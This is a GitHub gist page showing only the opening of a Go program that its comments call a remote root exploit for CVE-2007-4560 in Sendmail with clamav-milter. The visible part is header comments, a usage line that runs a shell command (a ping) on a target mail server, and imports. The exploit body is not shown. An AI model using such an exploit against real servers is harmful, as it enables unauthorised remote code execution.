Skip to content

Instantly share code, notes, and snippets.

View 0xjbb's full-sized avatar

Josh 0xjbb

  • /dev/null
  • Norfolk, UK
View GitHub Profile
@0xjbb
0xjbb / CVE-2007-4560.go
Last active March 10, 2021 20:09
[GO] ClamAV Milter Remote Code Execution [CVE-2007-4560]
package main
// Sendmail w/ clamav-milter Remote Root Exploit
// 'CVE-2007-4560'
// coded by https://github.com/0xjbb :)
// go run exploit.go -h 192.168.109.42 -p 25 -c "ping -c 5 192.168.49.109"
import (
"flag"
"log"
"net"
)